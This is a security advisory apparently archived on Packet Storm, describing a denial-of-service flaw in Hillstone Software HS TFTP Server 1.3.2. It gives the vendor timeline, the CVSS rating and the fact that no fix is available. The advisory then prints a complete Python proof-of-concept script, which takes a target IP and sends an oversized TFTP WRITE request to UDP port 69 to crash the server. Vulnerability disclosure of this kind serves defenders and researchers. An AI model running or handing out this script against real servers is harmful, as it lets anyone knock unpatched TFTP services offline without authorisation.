what you don't know can hurt you

Hillstone Software HS TFTP Server Denial Of Service

Hillstone Software HS TFTP Server Denial Of Service
Posted Dec 2, 2011
Authored by Prabhu S Angadi | Site secpod.com

Hillstone Software HS TFTP Server suffers from a denial of service vulnerability. Proof of concept exploit included. The vulnerability is caused due to improper validation of a WRITE/READ request parameter containing a long file name, which allows remote attackers to crash the service.

tags | exploit, remote, denial of service, proof of concept
SHA-256 | d85fb6660f78e545641e6b84a78b3e08561fe20866b6f07c082c038e3d26fced

Hillstone Software HS TFTP Server Denial Of Service

Change Mirror Download
##############################################################################
# Title : Hillstone Software HS TFTP Server Denial Of Service Vulnerability
# Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor : http://www.hillstone-software.com/hs_tftp_details.htm
# Advisory : http://secpod.org/blog/?p=419
# http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
# http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
# Version : Hillstone Software HS TFTP 1.3.2
# Date : 02/12/2011
##############################################################################

SecPod ID: 1031 21/09/2011 Issue Discovered
04/10/2011 Vendor Notified
No Response from Vendor
02/12/2011 Advisory Released


Class: Denial Of Service Severity: Medium


Overview:
---------
Hillstone Software HS TFTP Server version 1.3.2 is prone to a denial of
service vulnerability.


Technical Description:
----------------------
The vulnerability is caused due to improper validation of WRITE/READ Request
Parameter containing long file name, which allows remote attackers to crash
the service.


Impact:
--------
Successful exploitation could allow an attacker to cause denial of service
condition.


Affected Software:
------------------
Hillstone Software HS TFTP 1.3.2


Tested on:
-----------
Hillstone Software HS TFTP 1.3.2 on Windows XP SP3 & Win 7.
Older versions might be affected.


References:
-----------
http://secpod.org/blog/?p=419
http://www.hillstone-software.com/index.htm
http://www.hillstone-software.com/hs_tftp_details.htm
http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py


Proof of Concept:
----------------
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py


Solution:
----------
Not available


Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = PARTIAL
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
Risk factor = Medium


POC :
======

import socket,sys,time

port = 69
target = raw_input("Enter host/target ip address: ")

if not target:
print "Host/Target IP Address is not specified"
sys.exit(1)

print "you entered ", target

try:
socket.inet_aton(target)
except socket.error:
print "Invalid IP address found ..."
sys.exit(1)

try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)

## File name >= 222 length leads to crash
exploit = "\x90" * 2222

mode = "binary"
print "File name WRITE/READ crash"

## WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"

## READ command = \x00\x01
## data = "\x00\x01" + exploit + "\0" + mode + "\0"

sock.sendto(data, (target, port))
time.sleep(2)
sock.close()
try:
sock.connect()
except:
print "Remote TFTP server port is down..."
sys.exit(1)

Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close